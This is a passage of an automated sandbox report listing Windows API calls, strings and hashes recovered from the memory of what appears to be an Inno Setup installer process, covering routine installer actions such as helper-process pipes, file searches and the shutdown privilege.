                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,0045A861), ref: 0045A740
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: FreeVirtual
                                          • String ID:
                                          • API String ID: 1263568516-0
                                          • Opcode ID: e5a1d81624fd0ea0ca6df7bb48e7ecff761dbb388dc9058928e02473b5d13605
                                          • Instruction ID: b68ac2cbadfdda480c967e6d055cfdd63c693a43d000438897aaa66405a27238
                                          • Opcode Fuzzy Hash: e5a1d81624fd0ea0ca6df7bb48e7ecff761dbb388dc9058928e02473b5d13605
                                          • Instruction Fuzzy Hash: 60D092B17107005FEB94CF7A8CC5B0326E8BB08601B2185BAA908DB286E678D4208B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID:
                                          • API String ID: 2962429428-0
                                          • Opcode ID: ada167b39e06168283aa1de58693712353b2e1493b74d73bd649c322d38fd937
                                          • Instruction ID: f91bbd6786645de71ad529a75f1249e0221a6909fe05d9e6353a8ece16ee0238
                                          • Opcode Fuzzy Hash: ada167b39e06168283aa1de58693712353b2e1493b74d73bd649c322d38fd937
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00455B64: GetLocalTime.KERNEL32(?,00000000,00455CEB,?,?,0048DF10,00000000), ref: 00455B94
                                          • GetTickCount.KERNEL32 ref: 00455EE6
                                          • QueryPerformanceCounter.KERNEL32(00000000,00000000,0045617B,?,?,00000000,00000000,?,0045670E,?,00000000,00000000), ref: 00455EEE
                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000), ref: 00455EF8
                                          • GetCurrentProcessId.KERNEL32(?,00000000,00000000,0045617B,?,?,00000000,00000000,?,0045670E,?,00000000,00000000), ref: 00455F01
                                          • CreateNamedPipeA.KERNEL32(00000000,00080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00455F76
                                          • GetLastError.KERNEL32(00000000,00080003,00000006,00000001,00002000,00002000,00000000,00000000,?,00000000,00000000), ref: 00455F84
                                          • 6CAD5CA0.KERNEL32(00000000,C0000000,00000000,0048CA50,00000003,00000000,00000000,00000000,00456137), ref: 00455FCC
                                          • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00456126,?,00000000,C0000000,00000000,0048CA50,00000003,00000000,00000000,00000000,00456137), ref: 00456005
                                            • Part of subcall function 0042D80C: GetSystemDirectoryA.KERNEL32 ref: 0042D81F
                                          • 6CF47180.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004560AE
                                          • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 004560E8
                                          • CloseHandle.KERNEL32(000000FF,0045612D,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00456120
                                            • Part of subcall function 00451E44: GetLastError.KERNEL32(00000000,00451EDC,?,?,00000000,00000000,00000005,00000000,00452922,?,?,00000000,0048D628,00000004,00000000,00000000), ref: 00451E68
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: HandleTime$CloseErrorLastNamedPipeSystem$CountCounterCreateCurrentDirectoryF47180FileLocalPerformanceProcessQueryStateTick
                                          • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$g$helper %d 0x%x
                                          • API String ID: 2902378756-1343189204
                                          • Opcode ID: bcef79dbd4c116e068d320324f7cbf2eeb112e86b61b5acad7307fdb861079ce
                                          • Instruction ID: 4cf9e65d1c3a6a995f2f1225f91647b48c0c1d5ff0e907dc409e67b864181cf0
                                          • Opcode Fuzzy Hash: bcef79dbd4c116e068d320324f7cbf2eeb112e86b61b5acad7307fdb861079ce
                                          • Instruction Fuzzy Hash: 81714270E007449EDB10EB69CC42B9E77B8EB09705F5045AAFA08FB2C2D7785948CF69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetVersion.KERNEL32 ref: 00459756
                                          • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045976E
                                          • 6CAD5550.KERNEL32(00000000,GetNamedSecurityInfoA,advapi32.dll), ref: 0045977B
                                          • 6CAD5550.KERNEL32(00000000,SetNamedSecurityInfoA,00000000,GetNamedSecurityInfoA,advapi32.dll), ref: 00459788
                                          • 6CAD5550.KERNEL32(00000000,SetEntriesInAclW,00000000,SetNamedSecurityInfoA,00000000,GetNamedSecurityInfoA,advapi32.dll), ref: 00459796
                                          • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045994E), ref: 0045982A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D5550$AllocateHandleInitializeModuleVersion
                                          • String ID: GetNamedSecurityInfoA$SetEntriesInAclW$SetNamedSecurityInfoA$advapi32.dll
                                          • API String ID: 422192885-3478141794
                                          • Opcode ID: 8d17e719275ab2577aee2e47f0ea620ab2a40137b0091ccd33fc115fde3d0cc5
                                          • Instruction ID: 44abeef6ce0fed14890bb7ae348110eee090ef88d9448cfda06de1326518e158
                                          • Opcode Fuzzy Hash: 8d17e719275ab2577aee2e47f0ea620ab2a40137b0091ccd33fc115fde3d0cc5
                                          • Instruction Fuzzy Hash: 585140B1A00605EFDB10DB99C881BAFBBF8EF48711F20406AF904E6381D6399D05CB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422ABC
                                          • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422C86), ref: 00422ACC
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: MessageSendShowWindow
                                          • String ID:
                                          • API String ID: 1631623395-0
                                          • Opcode ID: 4fd2229586727529dd909d338d416359cb16df425a701a01cbc45ae89d0c01b5
                                          • Instruction ID: 5d0d6d93ff052dac4c0bf0c79e528bc47a43330df527cde392ec7e746acca06c
                                          • Opcode Fuzzy Hash: 4fd2229586727529dd909d338d416359cb16df425a701a01cbc45ae89d0c01b5
                                          • Instruction Fuzzy Hash: 21917370B00254EFDB11EFA9DA86F9D77F4AF04314F5101FAF504AB692C6B8AE409B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Window$ClientLongScreen$IconicPlacementRect
                                          • String ID: ,
                                          • API String ID: 2266315723-3772416878
                                          • Opcode ID: 53ee8b5847548daf3ae9e12d513e94a971cd81012a05b2c07befe07581d38511
                                          • Instruction ID: 2402e33c498d75b28160bea17ed0089161511ec0534d6f9e4dfe72ad5a3a0ad4
                                          • Opcode Fuzzy Hash: 53ee8b5847548daf3ae9e12d513e94a971cd81012a05b2c07befe07581d38511
                                          • Instruction Fuzzy Hash: EA115E71504201ABDB00DF69C884F9B37D8AF48314F05467EBD58DB286DB38D800CB6A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000028), ref: 00453D8F
                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00453D95
                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00453DB1
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00453DD8
                                          • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00453DDD
                                            • Part of subcall function 00453D60: MessageBoxA.USER32 ref: 00453D7A
                                          • 6CF44E70.USER32(00000002,00000000), ref: 00453DF1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupMessageOpenPrivilegePrivilegesValue
                                          • String ID: SeShutdownPrivilege
                                          • API String ID: 3685916817-3733053543
                                          • Opcode ID: 425daa456695ff12b040c707fb00818a360c311da1458f6e6ff48c0a39b208ab
                                          • Instruction ID: f4803013061f233bc47df458bdb93f2174b1bc76a245432ab8959e74f3c6c69c
                                          • Opcode Fuzzy Hash: 425daa456695ff12b040c707fb00818a360c311da1458f6e6ff48c0a39b208ab
                                          • Instruction Fuzzy Hash: B9F03C7064434166E620BEA68D47B5B75BC9B4078BF20452FBD10A91C3DBBD9A0C8A3F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,0048AD9A,?,?,00000000,0048D628,?,0048AF24,00000000,0048AF78,?,?,00000000,0048D628), ref: 0048ACB3
                                          • 6CAD69D0.KERNEL32(00000000,00000010), ref: 0048AD36
                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0048AD72,?,00000000,?,00000000,0048AD9A,?,?,00000000,0048D628,?,0048AF24,00000000), ref: 0048AD4E
                                          • FindClose.KERNEL32(000000FF,0048AD79,0048AD72,?,00000000,?,00000000,0048AD9A,?,?,00000000,0048D628,?,0048AF24,00000000,0048AF78), ref: 0048AD6C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Find$File$CloseFirstNext
                                          • String ID: isRS-$isRS-???.tmp
                                          • API String ID: 3541575487-3422211394
                                          • Opcode ID: 13330f41272388e9f7d5dbe32e1e5f4b1e15cd986a0661d02037791cef9b2fd9
                                          • Instruction ID: 0e7c5d1f6a80a2619a749149d95e7c55be76f1ac4ff9968a1b161a0a389471b0
                                          • Opcode Fuzzy Hash: 13330f41272388e9f7d5dbe32e1e5f4b1e15cd986a0661d02037791cef9b2fd9
                                          • Instruction Fuzzy Hash: 3031E571900508ABDB14EF65CC41ACEB7FDDB45315F1048B7A808E36A0D77C9E508B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,?,00000000,?,00000000,00472F9A,?,00000000,?,00000000,?,004730DE,00000000,00000000), ref: 00472D35
                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,00472E45,?,00000000,?,?,00000000,?,00000000,00472F9A,?,00000000,?,00000000), ref: 00472E21
                                          • FindClose.KERNEL32(000000FF,00472E4C,00472E45,?,00000000,?,?,00000000,?,00000000,00472F9A,?,00000000,?,00000000), ref: 00472E3F
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,00472F9A,?,00000000,?,00000000,?,004730DE,00000000), ref: 00472E98
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Find$File$First$CloseNext
                                          • String ID:
                                          • API String ID: 2001080981-0
                                          • Opcode ID: 19af6ca45c2ba80f5662784d48fead29993f15fb787146533f472a9f9fb352f2
                                          • Instruction ID: 8565db096cd6656ff44318b7ce681326fcd64e26bd3c9e11326f6da54d8c9e2f
                                          • Opcode Fuzzy Hash: 19af6ca45c2ba80f5662784d48fead29993f15fb787146533f472a9f9fb352f2
                                          • Instruction Fuzzy Hash: 1D715D7090020DAFDF21DFA5CD41AEFBBB9EF49304F1080AAE408A7291D6799B45DF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00455591
                                          • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004555B8
                                          • SetForegroundWindow.USER32(?,00000000,00455894,?,00000000,004558D0), ref: 004555C9
                                          • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00455894,?,00000000,004558D0), ref: 0045587F
                                          Strings
                                          • Cannot evaluate variable because [Code] isn't running yet, xrefs: 00455709
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: MessagePostWindow$ForegroundNtdllProc_
                                          • String ID: Cannot evaluate variable because [Code] isn't running yet
                                          • API String ID: 2236967946-3182603685
                                          • Opcode ID: c045dd0e4ffca7a39b73c25968a0fc1ea4027e2037cea88a701d7cc2bd8bc3cb
                                          • Instruction ID: b6dbf8914caa8b88eacadc0bf15bdb6cfef248980d0ce1246846ecff726245f3
                                          • Opcode Fuzzy Hash: c045dd0e4ffca7a39b73c25968a0fc1ea4027e2037cea88a701d7cc2bd8bc3cb
                                          • Instruction Fuzzy Hash: 2091F234604A04EFD715DF55C961F69BBF5EB49700F2184EAF904977A2C738AE04DB18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,004548D4), ref: 004547D0
                                          • 6CAD5550.KERNEL32(00000000,kernel32.dll,GetDiskFreeSpaceExA,00000000,004548D4), ref: 004547D6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D5550HandleModule
                                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                          • API String ID: 920177481-3712701948
                                          • Opcode ID: b24bdb0128d8144a5a3d3ab057e8c3d3c0be4aad0c5b06488440313102649fb1
                                          • Instruction ID: fdbcbf479f2cc21c60c0eaa899c79f38a2e8e07711426ce900d973d9a3396831
                                          • Opcode Fuzzy Hash: b24bdb0128d8144a5a3d3ab057e8c3d3c0be4aad0c5b06488440313102649fb1
                                          • Instruction Fuzzy Hash: 11318435A04659AFDB01EBE5C8929EEB7B8EF49304F50456AF800F7292D6385D09CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsIconic.USER32(?), ref: 00417DD7
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417DF5
                                          • GetWindowPlacement.USER32(?,0000002C), ref: 00417E2B
                                          • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417E52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Window$Placement$Iconic
                                          • String ID: ,
                                          • API String ID: 568898626-3772416878
                                          • Opcode ID: 0b81194dc1d1b1de540ed8c9507381ff605f161cdfbccd417236de09a261938e
                                          • Instruction ID: 882a3a085edc8f58efe4bb57e9082e6531e96cfad6ea4dffa077d9c007fbbeb8
                                          • Opcode Fuzzy Hash: 0b81194dc1d1b1de540ed8c9507381ff605f161cdfbccd417236de09a261938e
                                          • Instruction Fuzzy Hash: 66211B71600208ABCF10EF69D880EDA77B8AF48314F51456AFD18DF246D638ED448B68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNEL32(00000001,00000000,0045E3F8), ref: 0045E2B9
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,0045E3C3,?,00000001,00000000,0045E3F8), ref: 0045E2FF
                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0045E3A5,?,00000000,?,00000000,0045E3C3,?,00000001,00000000,0045E3F8), ref: 0045E385
                                          • FindClose.KERNEL32(000000FF,0045E3AC,0045E3A5,?,00000000,?,00000000,0045E3C3,?,00000001,00000000,0045E3F8), ref: 0045E39F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Find$File$CloseErrorFirstModeNext
                                          • String ID:
                                          • API String ID: 4011626565-0
                                          • Opcode ID: 02f22185026e8130c032ef72f42e6d07742c4e03d744510b1e6e5a8dfdb4d954
                                          • Instruction ID: 118e15ace6c4d21b16b4fc6ed86408dea88d0f343785c3a37886904967bb367b
                                          • Opcode Fuzzy Hash: 02f22185026e8130c032ef72f42e6d07742c4e03d744510b1e6e5a8dfdb4d954
                                          • Instruction Fuzzy Hash: 8A418671A006149FDB15DFA6CC81AAEB7B8EF88305F5044AAFC04E7341D67C9F488E58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNEL32(00000001,00000000,0045DFE1), ref: 0045DED8
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,0045DFC1,?,00000001,00000000,0045DFE1), ref: 0045DF1E
                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0045DFA3,?,00000000,?,00000000,0045DFC1,?,00000001,00000000,0045DFE1), ref: 0045DF83
                                          • FindClose.KERNEL32(000000FF,0045DFAA,0045DFA3,?,00000000,?,00000000,0045DFC1,?,00000001,00000000,0045DFE1), ref: 0045DF9D
                                          • SetErrorMode.KERNEL32(?,0045DFC8,0045DFC1,?,00000001,00000000,0045DFE1), ref: 0045DFBB
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Find$ErrorFileMode$CloseFirstNext
                                          • String ID:
                                          • API String ID: 3300381671-0
                                          • Opcode ID: aff3423789f717168a46b7fe3e5e644ec3e95599ad12f574d7c25b79c3c93c98
                                          • Instruction ID: 2cead2433a966ba10e75be37f65284a8db79719a2f7f50ebc2f7849e2f86b7b8
                                          • Opcode Fuzzy Hash: aff3423789f717168a46b7fe3e5e644ec3e95599ad12f574d7c25b79c3c93c98
                                          • Instruction Fuzzy Hash: 0A31E571A04608AFDB21EF61CC51ADEB7BCDF49704F5144B6FC09E7292D6386E448E68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsIconic.USER32(?), ref: 00478156
                                          • GetWindowLongA.USER32 ref: 00478174
                                          • ShowWindow.USER32(00000000,00000005,00000000,000000F0,004ADF64,00477A18,00477A44,00000000,00477A64,?,?,00000001,004ADF64), ref: 00478196
                                          • ShowWindow.USER32(00000000,00000000,00000000,000000F0,004ADF64,00477A18,00477A44,00000000,00477A64,?,?,00000001,004ADF64), ref: 004781AA
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Window$Show$IconicLong
                                          • String ID:
                                          • API String ID: 2754861897-0
                                          • Opcode ID: dd42d303b032d3669f183c7b283b3b541a3a0b03f4221659e2030451217323e5
                                          • Instruction ID: 07f2c47246589b5102690f02175be36208d71431ade03849a3bb04b26934ee78
                                          • Opcode Fuzzy Hash: dd42d303b032d3669f183c7b283b3b541a3a0b03f4221659e2030451217323e5
